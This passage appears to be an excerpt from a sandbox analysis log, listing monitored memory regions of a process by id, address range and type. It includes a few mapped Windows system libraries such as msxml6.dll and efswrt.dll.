region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9686 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9687 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9688 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9689 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9690 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9691 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9692 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9693 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9694 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9695 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9696 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9697 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9698 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9699 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9700 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9701 start_va = 0x7ffb16bf0000 end_va = 0x7ffb16e69fff monitored = 0 entry_point = 0x7ffb16c0a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 9702 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9703 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9704 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9705 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9706 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9707 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9708 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9709 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9710 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9711 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9712 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9713 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9714 start_va = 0x4120000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 9715 start_va = 0x28c0000 end_va = 0x28c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml6r.dll" filename = "\\Windows\\System32\\msxml6r.dll" (normalized: "c:\\windows\\system32\\msxml6r.dll") Region: id = 9716 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9717 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9718 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9719 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9720 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9721 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9722 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9723 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9724 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9725 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9726 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9727 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9728 start_va = 0x4120000 end_va = 0x4126fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 9729 start_va = 0x4130000 end_va = 0x413ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004130000" filename = "" Region: id = 9730 start_va = 0x8d20000 end_va = 0x8e1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008d20000" filename = "" Region: id = 9731 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9732 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9733 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9734 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9735 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9736 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9737 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9738 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9739 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9740 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9741 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9742 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9743 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9744 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9745 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9746 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9747 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9748 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9749 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9750 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9751 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9752 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9753 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9754 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9755 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9756 start_va = 0x10370000 end_va = 0x103effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010370000" filename = "" Region: id = 9757 start_va = 0x103f0000 end_va = 0x1046ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000103f0000" filename = "" Region: id = 9758 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 9759 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9760 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9761 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9762 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9763 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9764 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9765 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9766 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9767 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9768 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9769 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9770 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9771 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9772 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9773 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9774 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9775 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9776 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9777 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9778 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9779 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9780 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9781 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9782 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9783 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9784 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9785 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9786 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9787 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9788 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9789 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9790 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9791 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9792 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9793 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9794 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9795 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9796 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9797 start_va = 0x4140000 end_va = 0x4140fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004140000" filename = "" Region: id = 9798 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9799 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9800 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9801 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9802 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9803 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9804 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9805 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9806 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9807 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9808 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9809 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9810 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9811 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9812 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9813 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9814 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9815 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9816 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9817 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9818 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9819 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9820 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9821 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9822 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9823 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9824 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9825 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9826 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9827 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9828 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9829 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9830 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9831 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9832 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9833 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9834 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9835 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9836 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9837 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9838 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9839 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9840 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9841 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9842 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9843 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9844 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9845 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9846 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9847 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9848 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9849 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9850 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9851 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9852 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9853 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9854 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9855 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9856 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9857 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9858 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9859 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9860 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9861 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9862 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9863 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9864 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9865 start_va = 0x10470000 end_va = 0x104effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010470000" filename = "" Region: id = 9866 start_va = 0x7ffb180c0000 end_va = 0x7ffb1815bfff monitored = 0 entry_point = 0x7ffb181196a0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\System32\\efswrt.dll" (normalized: "c:\\windows\\system32\\efswrt.dll") Region: id = 9867 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9868 start_va = 0x10570000 end_va = 0x105effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010570000" filename = "" Region: id = 9869 start_va = 0x105f0000 end_va = 0x1066ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000105f0000" filename = "" Region: id = 9870 start_va = 0x4140000 end_va = 0x414ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 9871 start_va = 0x4140000 end_va = 0x415dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 9872 start_va = 0x41d0000 end_va = 0x41defff monitored = 